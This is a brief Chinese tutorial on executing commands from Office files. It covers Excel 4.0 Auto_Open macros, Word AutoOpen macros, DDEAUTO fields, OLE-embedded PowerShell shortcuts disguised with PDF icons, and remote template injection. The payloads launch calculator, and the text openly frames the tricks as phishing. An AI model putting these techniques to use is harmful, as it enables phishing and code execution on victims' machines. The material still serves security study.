目录
[Word DDE](#Word DDE)
[office OLE+LNK](#office OLE+LNK)
excel宏
先启用excel宏



插入宏表

如下写入

将A1改为Auto_Open(文件打开时自动执行宏)


保存后打开文件,成功命令执行

word宏
同样先开启宏



添加成功后点击宏

新建AutoOpen
Sub AutoOpen()
Shell ("calc")
End Sub

保存文件
再次打开成功执行命令

下面用office2016来演示
Word DDE
插入域

嵌入恶意公式
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}

保存后再次打开,成功执行命令

office OLE+LNK
在文件里插入一个恶意快捷方式
先随便创建一个快捷方式,让其指向powershell,并用-command指定恶意命令
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc
%SystemRoot%\system32\WindowsPowerShell\v1.0

去下一个pdf风格的png文件,改后缀为ico文件
在word中插入对象

选择package,更改为之前准备好的pdf图标


再选择之前创建的恶意快捷方式


已经被官方ban了

这里建议更改Ink文件的图标



再重新嵌入文档
这样虽然还是会被直接拦截,但被钓鱼的用户可能会复制出来运行

复制出来

双击运行成功执行命令

利用模板文件注入宏指令
1.制作包含宏的恶意模版文件(.dotm)
参照上面word宏的制作方式
2.将恶意模版文件上传至服务器。
3.新建并保存一个使用任意模版的docx文件。

将docx后缀改为zip

解压docx文件,修改 word\_rels\settings.xml.rels文件的Target属性,将其指向部署恶意模版文件的服务器。


使用zip格式压缩文件,并重新命名后缀为docx。
打开docx文件,成功执行命令

